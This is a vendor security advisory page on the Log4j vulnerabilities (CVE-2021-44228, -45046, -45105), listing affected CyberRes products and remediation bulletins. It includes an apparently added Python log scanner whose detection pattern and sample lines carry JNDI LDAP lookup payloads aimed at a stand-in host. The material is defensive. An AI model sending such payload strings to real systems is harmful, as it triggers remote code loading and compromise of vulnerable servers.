
Summary of CyberRes impact from Log4j or Log4Shell/LogJam (CVE-2021-44228) | Summary of CyberRes impacted by Denial of Service (DoS) (CVE-2021-45046) | Summary of CyberRes impacted by DoS (CVE-2021-45105)


Last Updated: April 26, 2022 8:35 am MST
***Indicates where an update has occurred

Micro Focus is continuing to analyze the remote code execution vulnerabilities (CVE-2021-44228, CVE-2021-45046) and the denial-of-service vulnerability (CVE-2021-45105) that have been identified in the Apache Log4j components used in many Java-based applications. As we, along with many others in the industry, continue to identify and understand the full impact of these vulnerabilities, we will make that information available to our customers, together with remediation instructions, until a patch or updated release becomes available.

Micro Focus’ Security teams have been actively investigating this issue since the initial disclosure, first to assess the scope of the vulnerability across our portfolio and software versions and then to devise a suitable mitigation plan for each of our products/versions that are determined to be affected. We have the indicators of compromise and are working with the Cybersecurity and Infrastructure Security Agency to stay current with changes to this situation. We have had no alerts on possible Log4j intrusions.

Impact to CyberRes products and remediation details

The remote code execution vulnerability, identified as CVE-2021-44228 and CVE-2021-45046, can allow an unauthenticated attacker to gain complete access to a target system. It can be triggered when a specially crafted string is parsed and processed by the vulnerable Log4j2 component. This could happen through any user-provided input.

Successful exploitation allows for arbitrary code execution in the targeted application. Attackers do not need prior access to the system to log the string and can remotely cause the logging event by using commands such as curl against a target system to log the malicious string in the application log. When processing the log, the vulnerable system reads the string and executes it, which in current attacks is used to execute the code from the malicious domain. Doing so can grant the attacker full access and control of the affected application.

There is also a denial-of-service vulnerability, CVE-2021-45105, which allows an attacker to cause a denial of service when a crafted string is interpreted.

Given the fact that logging code and functionalities in applications and services are typically designed to process a variety of external input data coming from upper layers and from many possible vectors, the biggest risk factor of this vulnerability is predicting whether an application has a viable attack vector path that will allow the malformed exploit string to reach the vulnerable Log4j2 code and trigger the attack.

A common pattern of exploitation risk, for example, is a web application (e.g., a web app built with Apache Struts) with code designed to process usernames, referrer, or user-agent strings in logs. These strings are provided as external input. An attacker can send a malformed username or set the user-agent to the crafted exploit string, hoping that this external input will be processed at some point by the vulnerable Log4j2 code and trigger code execution.
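To check whether such input has already reached your logs, the following added example (not Micro Focus code) scans web access logs for a Log4j2 JNDI lookup expression in the username, referrer and user-agent fields named above, and additionally in the request line. It assumes the Apache/Nginx "combined" log format; the sample lines, addresses and host names are constructed.

```python
import re
from urllib.parse import unquote

# Apache/Nginx "combined" access-log format (assumed log layout).
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referrer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)
# Log4j2 lookup expression that requests a JNDI resource.
JNDI_LOOKUP = re.compile(r'\$\{jndi:', re.IGNORECASE)
FIELDS = ("user", "request", "referrer", "user_agent")

def decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (line_number, client_ip, field) for each field holding a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = COMBINED.match(line.strip())
        if not match:
            continue  # not in combined format; skipped, not treated as clean
        for field in FIELDS:
            if JNDI_LOOKUP.search(decode(match.group(field))):
                hits.append((number, match.group("ip"), field))
    return hits

# Constructed sample lines (documentation IP ranges, .invalid host).
SAMPLE = [
    '192.0.2.10 - alice [10/Dec/2021:09:14:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:09:15:40 +0000] "GET / HTTP/1.1" 200 128 "-" "${jndi:ldap://host.invalid/a}"',
    '203.0.113.5 - - [10/Dec/2021:09:16:11 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fhost.invalid%2Fa%7D HTTP/1.1" 404 0 "https://shop.example/" "curl/7.79.1"',
    '203.0.113.9 - ${jndi:ldap://host.invalid/a} [10/Dec/2021:09:17:30 +0000] "POST /login HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, ip, field in scan(SAMPLE):
        print(f"line {number}: JNDI lookup in {field} from {ip}")
```

A hit shows that the string was sent, not that a vulnerable Log4j2 instance processed it. The match covers only the plain form of the lookup, so use it for triage alongside the product-specific remediation.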


CyberRes client recommendations

CyberRes SaaS Update

CyberRes is aware of the recently disclosed security issue related to the open-source Apache "Log4j2" utility (CVE-2021-44228). We are actively monitoring for this issue and have implemented additional protective and detective controls in all CyberRes SaaS environments. At this time there are no known products impacted in the SaaS environment. 

For our on-premise products:

  • We are issuing Security Bulletins with specific instructions on how to block the attack until the component is upgraded.
  • Please visit the Product Support portal for a list of the security bulletins specific to the Log4j compromise.
  • If a particular product is not listed, please continue to check the website as we are updating the list frequently.
  • If the matter is urgent and the update is not on the website, please open a support case at Support Resources | Micro Focus.

If a product is not listed below, it is NOT IMPACTED unless otherwise noted on the Support Bulletin Article. 

ArcSight - Security Operations

Reference Support Bulletin KM000003049 for further updates

| ArcSight Component | Remediation | Version |
|---|---|---|
| ESM | KM000003127 | 7.2, 7.5 |
| Logger | KM000003186 | 7.2 and above |
| Recon | KM000003189 | All versions |
| Intelligence | KM000003175 | All versions |
| Connectors | KM000003117 | 8.2 and above |
| Transformation Hub | KM000003257 | All Versions |
| Sentinel | KM000003122 | 8.2 to 8.5 |
| ArcSight Platform (Containerized) | KM000003254 | All versions |

ArcSight Detection Package: Read more about ArcSight’s response to Log4j-targeting cyber attacks

Fortify - Application Security

| Fortify Component | Remediation | Version |
|---|---|---|
| Audit Assistant | KM000003153 | 19.2 and newer |
| Static Code Analyzer (SCA_and_Apps) | KM000003178 | 20.1 and newer |
| Software Security Center | KM000003180 | 20.1 and newer |
| Java Runtime Agent | KM000003277 | 20.1 and newer |
| ScanCentral (SAST) | KM000003218 | 20.1 and newer |
| Application Defender | KM000003281 | 20.1 and newer |

Read Fortify's Response to log4j (CVE-2021-44228) 

NetIQ - Identity and Access Management

| NetIQ Component | Remediation | Version |
|---|---|---|
| Access Manager | KM000002997 | 4.5 and newer |
| NetIQ Risk Services | KM000003298 | 1.0 and newer |
| NetIQ SecureLogin Advanced Edition | KM000003043 | 9.0.0.2 |
| Change Guardian | KM000003114 | 5.2 to 6.2 |
| Advanced Authentication | KM000003047 | 6.0 and newer |
| ***Directory Resource & Administrator | KM000003185 | 10.0, 10.1 |

Voltage - Data Privacy and Protection

| Voltage Component | Remediation | Version |
|---|---|---|
| Structured Data Manager | KM000003242 | 7.6.1 and newer |
| SecureData Sentry | KM000003162 | 4.3 and below |

Our Support organization has standard handling procedures in place to ensure that customers reporting the issue receive the latest information from our R&D and Security teams. Knowing which versions of each Micro Focus product are deployed is a key data point to ensure that our customers receive the most appropriate action plan, once available.

If, after reviewing the guidance above, you still have an issue, please visit the Micro Focus Support portal and create a ticket. For all available bulletins, please visit the Micro Focus Security Alerts portal. 

This blog only contains information related to CyberRes products. For all other Micro Focus products, please refer to the Micro Focus Security Bulletin.
